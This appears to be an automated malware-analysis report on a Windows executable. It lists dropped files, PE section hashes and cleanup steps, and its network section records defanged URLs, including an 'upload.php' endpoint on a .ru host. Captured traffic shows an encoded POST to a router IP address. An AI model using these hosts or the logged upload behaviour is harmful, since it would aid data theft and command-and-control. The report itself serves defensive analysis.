C:\ea6d03fb84304f0031a48a\powershell_ise.resources.dll (4 bytes)
C:\ea6d03fb84304f0031a48a\about_job_details.help.txt (824 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.graphicalhost.dll (4408 bytes)
C:\ea6d03fb84304f0031a48a\windowsremotemanagement.adm (574 bytes)
C:\ea6d03fb84304f0031a48a\about_pssnapins.help.txt (6 bytes)
C:\ea6d03fb84304f0031a48a\about_reserved_words.help.txt (1 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.editor.dll (14450 bytes)
C:\ea6d03fb84304f0031a48a\powershell.exe.mui (10 bytes)
C:\ea6d03fb84304f0031a48a\about_data_sections.help.txt (5 bytes)
C:\ea6d03fb84304f0031a48a\about_bits_cmdlets.help.txt (7 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
C:\ea6d03fb84304f0031a48a\wevtfwd.dll (3351 bytes)
C:\ea6d03fb84304f0031a48a\about_escape_characters.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\about_functions.help.txt (586 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
C:\ea6d03fb84304f0031a48a\types.ps1xml (2510 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.consolehost.resources.dll (778 bytes)
C:\ea6d03fb84304f0031a48a\pspluginwkr.dll (1756 bytes)
C:\ea6d03fb84304f0031a48a\about_ref.help.txt (1 bytes)
C:\ea6d03fb84304f0031a48a\registry.format.ps1xml (20 bytes)
C:\ea6d03fb84304f0031a48a\filesystem.format.ps1xml (133 bytes)
C:\ea6d03fb84304f0031a48a\about_windows_powershell_2.0.help.txt (453 bytes)
C:\ea6d03fb84304f0031a48a\diagnostics.format.ps1xml (590 bytes)
C:\ea6d03fb84304f0031a48a\wtrinstaller.ico (4803 bytes)
C:\ea6d03fb84304f0031a48a\about_scopes.help.txt (76 bytes)
C:\ea6d03fb84304f0031a48a\certificate.format.ps1xml (155 bytes)
C:\ea6d03fb84304f0031a48a\about_remote_requirements.help.txt (6 bytes)
C:\ea6d03fb84304f0031a48a\about_comparison_operators.help.txt (11 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.gpowershell.resources.dll (408 bytes)
C:\ea6d03fb84304f0031a48a\about_pipelines.help.txt (411 bytes)
C:\ea6d03fb84304f0031a48a\wsmanhttpconfig.exe (3009 bytes)
C:\ea6d03fb84304f0031a48a\about_aliases.help.txt (6 bytes)
C:\ea6d03fb84304f0031a48a\about_switch.help.txt (489 bytes)
C:\ea6d03fb84304f0031a48a\about_arrays.help.txt (8 bytes)
C:\ea6d03fb84304f0031a48a\about_wmi_cmdlets.help.txt (8 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.security.dll-help.xml (1797 bytes)
C:\ea6d03fb84304f0031a48a\about_remote.help.txt (7 bytes)
C:\ea6d03fb84304f0031a48a\powershell_ise.exe (2526 bytes)
C:\ea6d03fb84304f0031a48a\windowsremoteshell.adm (12 bytes)
C:\ea6d03fb84304f0031a48a\$shtdwn$.req (788 bytes)
C:\ea6d03fb84304f0031a48a\about_debuggers.help.txt (21 bytes)
C:\ea6d03fb84304f0031a48a\wsmplpxy.dll (603 bytes)
C:\ea6d03fb84304f0031a48a\winrshost.exe (22 bytes)
C:\ea6d03fb84304f0031a48a\about_remote_troubleshooting.help.txt (146 bytes)
C:\ea6d03fb84304f0031a48a\profile.ps1 (772 bytes)
C:\ea6d03fb84304f0031a48a\pscustomsetuputil.exe (316 bytes)
C:\ea6d03fb84304f0031a48a\wsman.format.ps1xml (837 bytes)
C:\ea6d03fb84304f0031a48a\about_script_blocks.help.txt (3 bytes)
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1184 bytes)
%System%\SETBF.tmp (42 bytes)
%WinDir%\ocmsn.log (7791 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (16 bytes)
%System%\SET12.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (1281 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (12 bytes)
%System%\SETC.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (36 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (14022 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (950 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (4 bytes)
%System%\SET2D.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (17 bytes)
%System%\SET25.tmp (1281 bytes)
%System%\SET13.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (673 bytes)
%System%\SET20.tmp (2 bytes)
%System%\SET14.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (49 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (673 bytes)
%WinDir%\inf\SET32.tmp (38 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (3 bytes)
%System%\GroupPolicy\Adm\SET34.tmp (38 bytes)
%System%\SET2A.tmp (2 bytes)
%WinDir%\inf\oem10.PNF (10040 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (10 bytes)
%System%\SET7.tmp (35 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (601 bytes)
%WinDir%\msmqinst.log (5482 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (15 bytes)
%System%\SET22.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (673 bytes)
%System%\spmsg.dll (14 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (7385 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (10 bytes)
%System%\GroupPolicy\Adm\SET1A.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (7 bytes)
%System%\SET2B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (40 bytes)
%WinDir%\inf\SET18.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (3 bytes)
%System%\SETE.tmp (22 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (7 bytes)
%System%\SET6.tmp (2 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
%System%\wbem\SET4.tmp (4 bytes)
%System%\SET17.tmp (673 bytes)
%WinDir%\tabletoc.log (2313 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
%System%\SETA.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (7 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (13 bytes)
%WinDir%\MedCtrOC.log (8910 bytes)
%System%\config\SYSTEM.LOG (5401 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (3 bytes)
%System%\SET27.tmp (601 bytes)
%System%\GroupPolicy\Adm\SET1B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (9 bytes)
%System%\SET11.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (20 bytes)
%WinDir%\Help\SETC5.tmp (12287 bytes)
%System%\SET8.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (61 bytes)
%WinDir%\msgsocm.log (6541 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
%System%\SETF.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (22 bytes)
%System%\SET10.tmp (2 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (7971 bytes)
%System%\SET26.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (9 bytes)
%System%\SET21.tmp (35 bytes)
%System%\config\system (3267 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET38.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (31 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (673 bytes)
%WinDir%\SECD0.tmp (1897 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (2 bytes)
%WinDir%\imsins.log (3792 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (57 bytes)
%System%\GroupPolicy\Adm\SET1C.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (3 bytes)
%System%\SET16.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (3361 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (15 bytes)
%System%\CatRoot2\dberr.txt (1031 bytes)
%System%\SETB.tmp (1281 bytes)
%System%\SET1F.tmp (1 bytes)
%WinDir%\iis6.log (139812 bytes)
%WinDir%\comsetup.log (48646 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (6 bytes)
%System%\spupdsvc.exe (23 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (22 bytes)
%System%\SET28.tmp (22 bytes)
%System%\SET5.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (2321 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (1 bytes)
%System%\SET31.tmp (673 bytes)
%System%\SET2E.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (10 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
%System%\WindowsPowerShell\v1.0\SET3A.tmp (601 bytes)
%System%\SET29.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (21 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (6 bytes)
%System%\SET2C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (16 bytes)
%WinDir%\KB968930.log (242903 bytes)
%System%\SET15.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (18248 bytes)
%WinDir%\ntdtcsetup.log (22997 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (438 bytes)
%WinDir%\inf\oem10.inf (673 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (12 bytes)
%System%\SET24.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (10177 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (19 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
%WinDir%\FaxSetup.log (53338 bytes)
%WinDir%\tsoc.log (79170 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (1425 bytes)
%WinDir%\KB968930xp.cat (59 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (9 bytes)
%System%\winrm\0409\SET1D.tmp (601 bytes)
%System%\SETD.tmp (601 bytes)
%WinDir%\inf\SET19.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (18 bytes)
%System%\SET9.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (12 bytes)
%System%\winrm\0409\SET37.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (40 bytes)
%System%\WindowsPowerShell\v1.0\SET39.tmp (27 bytes)
%WinDir%\ocgen.log (71000 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (1281 bytes)
%System%\SET2F.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (17 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (23 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (2 bytes)
%System%\SET30.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (6 bytes)
%System%\wbem\SET1E.tmp (4 bytes)
%System%\SET23.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3B.tmp (24 bytes)
%WinDir%\netfxocm.log (9089 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (10 bytes)
%WinDir%\inf\SET33.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (7 bytes)
%WinDir%\assembly\tmp\J147ADHK\System.Management.Automation.dll (81046 bytes)
%WinDir%\assembly\tmp\M47ADGJM\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)
%WinDir%\assembly\tmp\G037ADGK\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)
%WinDir%\assembly\tmp\CUX147AD\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)
%WinDir%\assembly\tmp\N58BEHKN\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)
%WinDir%\assembly\tmp\S9DGJMPS\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)
%WinDir%\assembly\tmp\1KNQTWZ2\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)
%WinDir%\assembly\tmp\Q8BEHKNR\Microsoft.WSMan.Management.resources.dll (13 bytes)
%WinDir%\assembly\tmp\J258BEHK\Microsoft.PowerShell.Security.dll (2392 bytes)
%WinDir%\assembly\tmp\FX0369DG\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)
%WinDir%\assembly\tmp\CUX036AD\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)
%WinDir%\assembly\tmp\5NQUX036\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)
%WinDir%\assembly\tmp\1LOSVY15\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)
%WinDir%\assembly\tmp\HZ258BEI\Microsoft.WSMan.Management.dll (9608 bytes)
%WinDir%\assembly\tmp\ZHKNQTX0\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)
%WinDir%\assembly\tmp\8QTWZ258\System.Management.Automation.resources.dll (9320 bytes)
%WinDir%\assembly\tmp\FZ258CFI\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)
%WinDir%\assembly\tmp\P9CFILPS\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)
%WinDir%\assembly\tmp\YGJMQTWZ\Microsoft.PowerShell.Security.resources.dll (9 bytes)
%WinDir%\assembly\tmp\SADGJNQT\Microsoft.WSMan.Runtime.dll (7 bytes)
%WinDir%\assembly\tmp\L369CFIL\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)
%WinDir%\assembly\tmp\WEHKNQTW\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)
%WinDir%\assembly\tmp\3MPSVZ25\Microsoft.PowerShell.Editor.dll (32824 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp\Microsoft.PowerShell.Editor.dll (64500 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp\Microsoft.PowerShell.GraphicalHost.dll (47422 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD4.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp\Microsoft.WSMan.Management.dll (34061 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD1.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDB.tmp\Microsoft.WSMan.Runtime.dll (17713 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD3.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp\Microsoft.PowerShell.Security.dll (35530 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD5.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD2.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDC.tmp\System.Management.Automation.dll (105990 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (514 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\NGEN_SERVICE.LOG (83393 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp\Microsoft.PowerShell.GPowerShell.dll (50011 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 171329 | 171520 | 4.46072 | 169e0ec9c8715074e47f35bbb53b54fc |
.rdata | 176128 | 64274 | 64512 | 4.00146 | f084d038b87830ef124c9ff9a24f7f79 |
.data | 241664 | 16308 | 8192 | 3.64394 | 5238aa112cca1d1989d6346f8c233774 |
.ndata | 258048 | 201167 | 201216 | 5.54393 | 1dfbf0118c6d8708a97a1eacc128cdea |
.rsrc | 462848 | 94524 | 94720 | 4.29356 | 158f870d535a930f56ef135a9ca3eb4e |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 2
0fb144ae2c062287b8b800598a35f8f0
215143874c39fb2025bcffff966b6056
Network Activity
URLs
URL | IP |
---|---|
hxxp://microsoft.com/ | 134.170.185.46 |
hxxp://e10088.dspb.akamaiedge.net/ | |
hxxp://e10088.dspb.akamaiedge.net/uk-ua/ | |
hxxp://a767.dscms.akamai.net/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe | |
hxxp://b14-mini.ru/upload.php | |
hxxp://61.3.49.73/ | |
hxxp://download.microsoft.com/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe | 188.43.73.10 |
hxxp://www.microsoft.com/ | 23.223.41.68 |
hxxp://www.microsoft.com/uk-ua/ | 23.223.41.68 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: microsoft.com
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.microsoft.com/
Server: Microsoft-IIS/8.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Thu, 16 Jul 2015 02:18:40 GMT
Connection: close
Content-Length: 148
<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://VVV.microsoft.com/">here</a></body>..
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 61.3.49.73
Content-Length: 352
Cache-Control: no-cache
dGtGgMVsUyyOMFnmPGUggMxGkq3uegesPHrOmB3x2hJyReKthoxND9/EeNQRDhnvRfQv23yOEVhB4h/0uIy4kB/LjhzU6Sh4AWccRKVb/dqHb1c TIbn9I6KP3TTnaXNtWGTxNIYyHPDPPvuObDYAIJ7dM89gd7H4je3nZcUi1DWtKmBxPWNV eGI2Its9DE1oQDbHdbOyCMnphUfFxf10onTCC9GDvxiRThJ6je7Q8Z7LxWnDWuCtmcX9pLErdcTpH89J2Cueu3AtmMaOm5M8ct/DUxOb0N/Wa7VP3JDWqopHKj3j1CrKP2GQvsEqGWidF/TwvYxCnsMG/ZM9m8m1ZbKpFLdw==
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Basic realm="DSL-2520U_Z2"
Content-Type: text/html
Transfer-Encoding: chunked
Server: RomPager/4.07 UPnP/1.0
EXT:
HTTP/1.1 401 Unauthorized..WWW-Authenticate: Basic realm="DSL-2520U_Z2"..Content-Type: text/html..Transfer-Encoding: chunked..Server: RomPager/4.07 UPnP/1.0..EXT:..083..<html>.<head>.<title>Protected Object</title></head><body>.<h1>Protected Object</h1>This object on the RomPager server is protected..0..083..<html>.<head>.<title>Protected Object</title></head><body>.<h1>Protected Object</h1>This object on the RomPager server is protected..0..
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Cache-Control: no-cache
Host: VVV.microsoft.com
HTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: hXXp://VVV.microsoft.com/uk-ua/
Date: Thu, 16 Jul 2015 02:18:41 GMT
Connection: keep-alive
X-CCC: SE
X-CID: 2
....
GET /uk-ua/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Cache-Control: no-cache
Host: VVV.microsoft.com
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/8.0
CorrelationVector: tfQUF9cAt0GGFYxz.1.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
Access-Control-Allow-Credentials: true
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Content-Length: 233992
Date: Thu, 16 Jul 2015 02:18:42 GMT
Connection: keep-alive
Set-Cookie: MS-CV=tfQUF9cAt0GGFYxz.1; domain=.microsoft.com; expires=Fri, 17-Jul-2015 02:18:41 GMT; path=/
X-CCC: SE
X-CID: 2
...<!DOCTYPE html ><html xmlns:mscom="hXXp://schemas.microsoft.com/CMSvNext" xmlns:md="hXXp://schemas.microsoft.com/mscom-data" lang="uk" xmlns="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="shortcut icon" href="//VVV.microsoft.com/favicon.ico?v2" /><script type="text/javascript" src="hXXp://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.7.2.min.js"> .. // Third party scripts and code linked to or referenced from this website are licensed to you by the parties that own such code, not by Microsoft. See ASP.NET Ajax CDN Terms of Use - hXXp://VVV.asp.net/ajaxlibrary/CDN.ashx... </script><script type="text/javascript" language="javascript">/*<![CDATA[*/if($(document).bind("mobileinit",function(){$.mobile.autoInitializePage=!1}),navigator.userAgent.match(/IEMobile\/10\.0/)){var msViewportStyle=document.createElement("style");msViewportStyle.appendChild(document.createTextNode("@-ms-viewport{width:auto!important}")),document.getElementsByTagName("head")[0].appendChild(msViewportStyle)}/*]]>*/</script><script type="text/javascript" src="hXXp://ajax.aspnetcdn.com/ajax/jquery.mobile/1.3.2/jquery.mobile-1.3.2.min.js"></script><script type="text/javascript" src="hXXp://i.s-microsoft.com/library/svy/broker.js"></script><title>Microsoft..... ................ .......
<<< skipped >>>
